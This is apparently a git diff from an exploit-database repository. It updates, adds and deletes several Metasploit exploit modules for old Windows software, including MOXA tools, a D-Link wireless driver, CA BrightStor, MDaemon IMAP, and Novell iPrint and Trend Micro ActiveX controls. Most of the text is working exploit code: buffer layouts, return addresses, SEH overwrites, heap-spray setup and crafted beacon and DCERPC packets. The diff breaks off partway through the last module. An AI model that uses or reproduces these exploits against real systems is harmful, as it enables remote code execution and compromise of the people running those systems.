'Ret' => 0x00C750A1 } ] + [ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x00C750A1 } ] #?? ], 'DisclosureDate' => 'Aug 25 2010', 'DefaultTarget' => 0)) @@ -84,13 +95,13 @@ class Metasploit3 < Msf::Exploit::Remote # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - + # Setup exploit buffers nops = Rex::Text.to_unescape(make_nops(4)) ret = Rex::Text.to_unescape([target.ret].pack('V')) blocksize = 0x40000 - fillto = 500 - + fillto = 500 + # ActiveX parameters clsid = "15DBC3F9-9F0A-472E-8061-043D9CEC52F0" @@ -118,9 +129,9 @@ var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}); var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace}); while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock}; var #{j_memory} = new Array(); -for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) { +for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) { #{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode}; -} +} #{ufpbctrl}.extSetOwner(unescape('#{ret}')); | @@ -133,4 +144,4 @@ for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) { # Handle the payload handler(cli) end -end \ No newline at end of file +end diff --git a/platforms/windows/remote/16381.rb b/platforms/windows/remote/16381.rb index 338629bf3..0e2af869a 100755 --- a/platforms/windows/remote/16381.rb +++ b/platforms/windows/remote/16381.rb @@ -1,82 +1,76 @@ ## -# $Id: moxa_mdmtool.rb 11039 2010-11-14 19:03:24Z jduck $ +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework ## -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## +class MetasploitModule < Msf::Exploit::Remote -class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking - Rank = GreatRanking + include Msf::Exploit::Remote::TcpServer + include Msf::Exploit::Remote::Seh - include Msf::Exploit::Remote::TcpServer - include Msf::Exploit::Remote::Seh + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MOXA Device Manager Tool 2.1 Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in MOXA MDM Tool 2.1. + When sending a specially crafted MDMGw (MDM2_Gateway) response, an + attacker may be able to execute arbitrary code. + }, + 'Author' => [ 'Ruben Santamarta', 'MC' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2010-4741'], + [ 'OSVDB', '69027'], + [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ], + [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate' + }, + 'Payload' => + { + 'Space' => 600, + 'BadChars' => "\x00\x0a\x0d\x20", + 'StackAdjustment' => -3500 + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me... + ], + 'Privileged' => false, + 'DisclosureDate' => 'Oct 20 2010', + 'DefaultTarget' => 0)) - def initialize(info = {}) - super(update_info(info, - 'Name' => 'MOXA Device Manager Tool 2.1 Buffer Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in MOXA MDM Tool 2.1. - When sending a specially crafted MDMGw (MDM2_Gateway) response, an - attacker may be able to execute arbitrary code. - }, - 'Author' => [ 'Ruben Santamarta', 'MC' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 11039 $', - 'References' => - [ - [ 'OSVDB', '69027'], - [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ], - [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-Alert-10-293-02.pdf' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - 'InitialAutoRunScript' => 'migrate -f', - }, - 'Payload' => - { - 'Space' => 600, - 'BadChars' => "\x00\x0a\x0d\x20", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me... - ], - 'Privileged' => false, - 'DisclosureDate' => 'Oct 20 2010', - 'DefaultTarget' => 0)) + register_options( + [ + OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ]) + ], self.class) + end - register_options( - [ - OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ]) - ], self.class) - end + def on_client_connect(client) - def on_client_connect(client) + return if ((p = regenerate_payload(client)) == nil) - return if ((p = regenerate_payload(client)) == nil) + client.get_once - client.get_once + sploit = rand_text_alpha_upper(18024) - sploit = rand_text_alpha_upper(18024) + sploit[0, 4] = [0x29001028].pack('V') + sploit[472, payload.encoded.length] = payload.encoded + sploit[1072, 8] = generate_seh_record(target.ret) + sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string - sploit[0, 4] = [0x29001028].pack('V') - sploit[472, payload.encoded.length] = payload.encoded - sploit[1072, 8] = generate_seh_record(target.ret) - sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string + client.put(sploit) - client.put(sploit) + handler(client) - handler(client) + service.close_client(client) - service.close_client(client) - - end -end + end +end \ No newline at end of file diff --git a/platforms/windows/remote/16386.rb b/platforms/windows/remote/16386.rb deleted file mode 100755 index 431ba9cff..000000000 --- a/platforms/windows/remote/16386.rb +++ /dev/null @@ -1,202 +0,0 @@ -## -# $Id: dlink_wifi_rates.rb 9670 2010-07-03 03:19:07Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = LowRanking - - include Msf::Exploit::Lorcon2 - include Msf::Exploit::KernelMode - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in the A5AGU.SYS driver provided - with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow - allows remote code execution in kernel mode. The stack buffer overflow is triggered - when a 802.11 Beacon frame is received that contains a long Rates information - element. This exploit was tested with version 1.0.1.41 of the - A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer - versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340 - adapter and appear to resolve this flaw, but D-Link does not offer an updated - driver for the DWL-G132. Since this vulnerability is exploited via beacon frames, - all cards within range of the attack will be affected. The tested adapter used - a MAC address in the range of 00:11:95:f2:XX:XX. - - Vulnerable clients will need to have their card in a non-associated state - for this exploit to work. The easiest way to reproduce this bug is by starting - the exploit and then accessing the Windows wireless network browser and - forcing it to refresh. - - D-Link was NOT contacted about this flaw. A search of the SecurityFocus - database indicates that D-Link has not provided an official patch or - solution for any of the seven flaws listed at the time of writing: - (BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689). - - As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the - DWL-G132 driver (v1.21). - - This module depends on the Lorcon2 library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon2 documentation - (external/ruby-lorcon/README) for more information. - }, - 'Author' => - [ - 'hdm', # discovery, exploit dev - 'skape', # windows kernel ninjitsu - 'Johnny Cache ' # making all of this possible - ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 9670 $', - 'References' => - [ - ['CVE', '2006-6055'], - ['OSVDB', '30296'], - ['URL', 'http://projects.info-pull.com/mokb/MOKB-13-11-2006.html'], - ['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'], - ], - 'Privileged' => true, - - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - - 'Payload' => - { - # Its a beautiful day in the neighborhood... - 'Space' => 1000 - }, - 'Platform' => 'win', - 'Targets' => - [ - # Windows XP SP2 with the latest updates - # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519) - [ 'Windows XP SP2 (5.1.2600.2122), A5AGU.sys 1.0.1.41', - { - 'Ret' => 0x8066662c, # jmp edi - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dbb27, - } - } - } - ], - - # Windows XP SP2 install media, no patches - # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158) - [ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41', - { - 'Ret' => 0x804f16eb, # jmp edi - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dc0c7, - } - } - } - ] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Nov 13 2006')) - - register_options( - [ - OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']), - OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]) - ], self.class) - end - - def exploit - open_wifi - - stime = Time.now.to_i - rtime = datastore['RUNTIME'].to_i - count = 0 - - print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...") - while (stime + rtime > Time.now.to_i) - wifi.write(create_beacon) - select(nil, nil, nil, 0.10) if (count % 100 == 0) - - count += 1 - - # Exit if we get a session - break if session_created? - end - - print_status("Completed sending beacons.") - end - - -# -# The following research was provided by Gil Dabah of ZERT -# -# The long rates field bug can be triggered three different ways (at least): -# 1) Send a single rates IE with valid rates up front and long data -# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data -# 3) Send two IE rates fields, with the second one containing the long data (this exploit) -# - - def create_beacon - - ssid = rand_text_alphanumeric(6) - bssid = ("\x00" * 2) + rand_text(4) - src = ("\x90" * 4) + "\xeb\x2b" - seq = [rand(255)].pack('n') - - buff = rand_text(75) - buff[0, 2] = "\xeb\x49" - buff[71, 4] = [target.ret].pack('V') - - frame = - "\x80" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - src + # src - bssid + # bssid - seq + # seq - rand_text(8) + # timestamp value - "\x64\x00" + # beacon interval - "\x00\x05" + # capability flags - - # ssid tag - "\x00" + ssid.length.chr + ssid + - - # supported rates - "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + - - # current channel - "\x03" + "\x01" + channel.chr + - - # eip was his name-o - "\x01" + buff.length.chr + buff + - - payload.encoded - - return frame - end - -end diff --git a/platforms/windows/remote/16417.rb b/platforms/windows/remote/16417.rb index d5fcbe8fa..d0623107e 100755 --- a/platforms/windows/remote/16417.rb +++ b/platforms/windows/remote/16417.rb @@ -1,89 +1,84 @@ -## -# $Id: tape_engine_8A.rb 10551 2010-10-05 12:38:46Z swtornio $ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# web site for more information on licensing and terms of use. +# http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = AverageRanking + Rank = AverageRanking - include Msf::Exploit::Remote::DCERPC + include Msf::Exploit::Remote::DCERPC - def initialize(info = {}) - super(update_info(info, - 'Name' => 'CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup - r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow - the buffer and execute arbitrary code. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 10551 $', - 'References' => - [ - [ 'OSVDB', '68330'], - [ 'URL', 'http://www.metasploit.com/users/mc' ], - ], - 'Privileged' => true, - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Payload' => - { - 'Space' => 500, - 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'BrightStor ARCserve r11.5/Windows 2003', { 'Ret' => 0x28eb6493 } ], - ], - 'DisclosureDate' => 'Oct 4 2010', - 'DefaultTarget' => 0)) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup + r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow + the buffer and execute arbitrary code. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'OSVDB', '68330'], + [ 'URL', 'http://www.metasploit.com/users/mc' ], + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 500, + 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'BrightStor ARCserve r11.5/Windows 2003', { 'Ret' => 0x28eb6493 } ], + ], + 'DisclosureDate' => 'Oct 4 2010', + 'DefaultTarget' => 0)) - register_options([ Opt::RPORT(6502) ], self.class) - end + register_options([ Opt::RPORT(6502) ], self.class) + end - def exploit + def exploit - connect + connect - handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) - print_status("Binding to #{handle} ...") + handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) + print_status("Binding to #{handle} ...") - dcerpc_bind(handle) - print_status("Bound to #{handle} ...") + dcerpc_bind(handle) + print_status("Bound to #{handle} ...") - request = "\x00\x04\x08\x0c\x05\x00\x00\x00\x00\x00" - request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + request = "\x00\x04\x08\x0c\x05\x00\x00\x00\x00\x00" + request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - dcerpc.call(0x2B, request) + dcerpc.call(0x2B, request) - sploit = NDR.long(4) - sploit << NDR.string(rand_text_alpha_upper(1002) + [target.ret].pack('V') + payload.encoded + "\x00") + sploit = NDR.long(4) + sploit << NDR.string(rand_text_alpha_upper(1002) + [target.ret].pack('V') + payload.encoded + "\x00") - print_status("Trying target #{target.name}...") + print_status("Trying target #{target.name}...") - begin - dcerpc_call(0x8A, sploit) - rescue Rex::Proto::DCERPC::Exceptions::NoResponse - end + begin + dcerpc_call(0x8A, sploit) + rescue Rex::Proto::DCERPC::Exceptions::NoResponse + end - handler - disconnect + handler + disconnect - end + end end =begin @@ -94,4 +89,4 @@ long sub_100707D0 ( [in] long arg_2, [in][ref][string] char * arg_3 ); -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/16477.rb b/platforms/windows/remote/16477.rb deleted file mode 100755 index b1713fb09..000000000 --- a/platforms/windows/remote/16477.rb +++ /dev/null @@ -1,83 +0,0 @@ -## -# $Id: mdaemon_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = GreatRanking - - include Msf::Exploit::Remote::Imap - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow', - 'Description' => %q{ - This module exploits a buffer overflow in the CRAM-MD5 - authentication of the MDaemon IMAP service. This - vulnerability was discovered by Muts. - }, - 'Author' => [ 'anonymous' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision: 9583 $', - 'References' => - [ - [ 'CVE', '2004-1520'], - [ 'OSVDB', '11838'], - [ 'BID', '11675'], - ], - 'Privileged' => true, - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 500, - 'BadChars' => "\x00", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ], - ], - 'DisclosureDate' => 'Nov 12 2004', - 'DefaultTarget' => 0)) - end - - def exploit - connect - - print_status("Asking for CRAM-MD5 authentication...") - sock.put("a001 authenticate cram-md5\r\n") - res = sock.get_once - - - print_status("Received CRAM-MD5 answer: #{res.chomp}") - # Magic no return-address exploitation ninjaness! - buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff" - req = Rex::Text.encode_base64(buf) + "\r\n" - sock.put(req) - res = sock.get_once - - print_status("Received authentication reply: #{res.chomp}") - print_status("Sending LOGOUT to close the thread and trigger an exception") - sock.put("a002 LOGOUT\r\n") - res = sock.get_once - - print_status("Received LOGOUT reply: #{res.chomp}") - select(nil,nil,nil,1) - - handler - disconnect - end - -end diff --git a/platforms/windows/remote/16501.rb b/platforms/windows/remote/16501.rb deleted file mode 100755 index 879303bce..000000000 --- a/platforms/windows/remote/16501.rb +++ /dev/null @@ -1,154 +0,0 @@ -## -# $Id: novelliprint_callbackurl.rb 10429 2010-09-21 18:46:29Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -## -# novelliprint_callbackurl.rb -# -# Novell iPrint Client ActiveX Control call-back-url Buffer Overflow exploit for the Metasploit Framework -# -# Exploit successfully tested on the following platforms: -# - Novell iPrint Client 5.40 on Internet Explorer 7, Windows XP SP3 -# - Novell iPrint Client 5.42 on Internet Explorer 7, Windows XP SP3 -# - Novell iPrint Client 5.42 on Internet Explorer 7, Windows Vista SP2 -# -# ienipp.ocx version tested: -# File Version: 5.4.0.0 and 5.4.2.0 -# ClassID: 36723F97-7AA0-11D4-8919-FF2D71D0D32C -# RegKey Safe for Script: True -# RegKey Safe for Init: True -# KillBitSet: False -# -# References: -# - CVE-2010-1527 -# - OSVDB 67411 -# - http://secunia.com/secunia_research/2010-104/ - Original advisory by Carsten Eiram, Secunia Research -# - http://www.exploit-db.com/exploits/15042/ - MOAUB #19 exploit -# - http://www.exploit-db.com/moaub-19-novell-iprint-client-browser-plugin-call-back-url-stack-overflow/ - MOAUB #14 binary analysis -# - http://www.rec-sec.com/2010/09/21/novell-iprint-callbackurl-buffer-overflow-exploit/ - Metasploit exploit by Trancer, Recognize-Security -# -# Trancer -# http://www.rec-sec.com -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking - - include Msf::Exploit::Remote::HttpServer::HTML - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Novell iPrint Client ActiveX Control call-back-url Buffer Overflow', - 'Description' => %q{ - This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42. - When sending an overly long string to the 'call-back-url' parameter in an - op-client-interface-version action of ienipp.ocx an attacker may be able to - execute arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'Trancer '$Revision: 10429 $', - 'References' => - [ - [ 'CVE', '2010-1527' ], - [ 'OSVDB', '67411'], - [ 'URL', 'http://secunia.com/secunia_research/2010-104/' ], # Carsten Eiram, Secunia Research - [ 'URL', 'http://www.exploit-db.com/exploits/15042/' ], # MOAUB #19 - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ] - ], - 'DisclosureDate' => 'Aug 20 2010', - 'DefaultTarget' => 0)) - end - - def autofilter - false - end - - def check_dependencies - use_zlib - end - - def on_request_uri(cli, request) - # Re-generate the payload. - return if ((p = regenerate_payload(cli)) == nil) - - # Encode the shellcode. - shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - # Setup exploit buffers - nops = Rex::Text.to_unescape([target.ret].pack('V')) - ret = [target.ret].pack('V') - ret = ret * 250 - blocksize = 0x40000 - fillto = 500 - offset = target['Offset'] - - # ActiveX parameters - clsid = "36723F97-7AA0-11D4-8919-FF2D71D0D32C" - - # Randomize the javascript variable names - ienipp = rand_text_alpha(rand(100) + 1) - j_shellcode = rand_text_alpha(rand(100) + 1) - j_nops = rand_text_alpha(rand(100) + 1) - j_ret = rand_text_alpha(rand(100) + 1) - j_headersize = rand_text_alpha(rand(100) + 1) - j_slackspace = rand_text_alpha(rand(100) + 1) - j_fillblock = rand_text_alpha(rand(100) + 1) - j_block = rand_text_alpha(rand(100) + 1) - j_memory = rand_text_alpha(rand(100) + 1) - j_counter = rand_text_alpha(rand(30) + 2) - - html = %Q| - - - - - - -| - - print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") - - # Transmit the response to the client - send_response(cli, html, { 'Content-Type' => 'text/html' }) - - # Handle the payload - handler(cli) - end - -end diff --git a/platforms/windows/remote/16596.rb b/platforms/windows/remote/16596.rb deleted file mode 100755 index cf43c48cb..000000000 --- a/platforms/windows/remote/16596.rb +++ /dev/null @@ -1,147 +0,0 @@ -## -# $Id: trendmicro_extsetowner.rb 10538 2010-10-04 04:26:09Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -## -# trendmicro_extsetowner.rb -# -# Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution exploit for the Metasploit Framework -# -# Exploit successfully tested on the following platforms: -# - Trend Micro Internet Security Pro 2010 on Internet Explorer 7, Windows XP SP3 -# - Trend Micro Internet Security Pro 2010 on Internet Explorer 7, Windows Vista SP2 -# -# UfPBCtrl.dll version tested: -# File Version: 17.50.0.1366 -# ClassID: 15DBC3F9-9F0A-472E-8061-043D9CEC52F0 -# RegKey Safe for Script: True -# RegKey Safe for Init: True -# KillBitSet: False -# -# References: -# - CVE-2010-3189 -# - OSVDB 67561 -# - http://www.zerodayinitiative.com/advisories/ZDI-10-165/ - Original advisory by Andrea Micalizzi aka rgod via Zero Day Initiative -# - http://www.exploit-db.com/exploits/14878/ - MOAUB #03 exploit -# - http://www.exploit-db.com/trend-micro-internet-security-pro-2010-activex-extsetowner-remote-code-execution/ - MOAUB #03 binary analysis -# - http://www.rec-sec.com/2010/09/28/trend-micro-internet-security-2010-rce-exploit/ - Metasploit exploit by Trancer, Recognize-Security -# -# Trancer -# http://www.rec-sec.com -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking - - include Msf::Exploit::Remote::HttpServer::HTML - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution', - 'Description' => %q{ - This module exploits a remote code execution vulnerability in Trend Micro - Internet Security Pro 2010 ActiveX. - When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll - an attacker may be able to execute arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'Trancer '$Revision: 10538 $', - 'References' => - [ - [ 'CVE', '2010-3189' ], - [ 'OSVDB', '67561'], - [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-165/' ], # Andrea Micalizzi aka rgod via Zero Day Initiative - [ 'URL', 'http://www.exploit-db.com/exploits/14878/' ], # MOAUB #03 - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x00C750A1 } ] #?? - ], - 'DisclosureDate' => 'Aug 25 2010', - 'DefaultTarget' => 0)) - end - - def autofilter - false - end - - def check_dependencies - use_zlib - end - - def on_request_uri(cli, request) - # Re-generate the payload. - return if ((p = regenerate_payload(cli)) == nil) - - # Encode the shellcode. - shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - # Setup exploit buffers - nops = Rex::Text.to_unescape(make_nops(4)) - ret = Rex::Text.to_unescape([target.ret].pack('V')) - blocksize = 0x40000 - fillto = 500 - - # ActiveX parameters - clsid = "15DBC3F9-9F0A-472E-8061-043D9CEC52F0" - - # Randomize the javascript variable names - ufpbctrl = rand_text_alpha(rand(100) + 1) - j_shellcode = rand_text_alpha(rand(100) + 1) - j_nops = rand_text_alpha(rand(100) + 1) - j_ret = rand_text_alpha(rand(100) + 1) - j_headersize = rand_text_alpha(rand(100) + 1) - j_slackspace = rand_text_alpha(rand(100) + 1) - j_fillblock = rand_text_alpha(rand(100) + 1) - j_block = rand_text_alpha(rand(100) + 1) - j_memory = rand_text_alpha(rand(100) + 1) - j_counter = rand_text_alpha(rand(30) + 2) - - html = %Q| - - -| - - print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") - - # Transmit the response to the client - send_response(cli, html, { 'Content-Type' => 'text/html' }) - - # Handle the payload - handler(cli) - end -end diff --git a/platforms/windows/remote/16685.rb b/platforms/windows/remote/16685.rb index ff969fed8..1c90f74b3 100755 --- a/platforms/windows/remote/16685.rb +++ b/platforms/windows/remote/16685.rb @@ -1,85 +1,79 @@ ## -# $Id: moxa_mediadbplayback.rb 10914 2010-11-05 02:58:01Z swtornio $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote - Rank = AverageRanking + Rank = AverageRanking - include Msf::Exploit::FILEFORMAT + include Msf::Exploit::FILEFORMAT - def initialize(info = {}) - super(update_info(info, - 'Name' => 'MOXA MediaDBPlayback ActiveX Control Buffer Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When - sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5) - an attacker may be able to execute arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], - 'Version' => '$Revision: 10914 $', - 'References' => - [ - [ 'OSVDB', '68986'], - [ 'URL', 'http://www.moxa.com' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', - }, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0a0a0a0a } ] - ], - 'DisclosureDate' => 'Oct 19 2010', - 'DefaultTarget' => 0)) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MOXA MediaDBPlayback ActiveX Control Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When + sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5) + an attacker may be able to execute arbitrary code. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'MC' ], + 'References' => + [ + [ 'CVE', '2010-4742' ], + [ 'OSVDB', '68986'], + [ 'URL', 'http://www.moxa.com' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'DisablePayloadHandler' => 'true', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0a0a0a0a } ] + ], + 'DisclosureDate' => 'Oct 19 2010', + 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']), - ], self.class) - end + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']), + ], self.class) + end - def exploit - # Encode the shellcode. - shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) + def exploit + # Encode the shellcode. + shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - # Create some nops. - nops = Rex::Text.to_unescape(make_nops(4)) + # Create some nops. + nops = Rex::Text.to_unescape(make_nops(4)) - # Set the return. - ret = Rex::Text.uri_encode([target.ret].pack('L')) + # Set the return. + ret = Rex::Text.uri_encode([target.ret].pack('L')) - # Randomize the javascript variable names. - vname = rand_text_alpha(rand(100) + 1) - var_i = rand_text_alpha(rand(30) + 2) - rand1 = rand_text_alpha(rand(100) + 1) - rand2 = rand_text_alpha(rand(100) + 1) - rand3 = rand_text_alpha(rand(100) + 1) - rand4 = rand_text_alpha(rand(100) 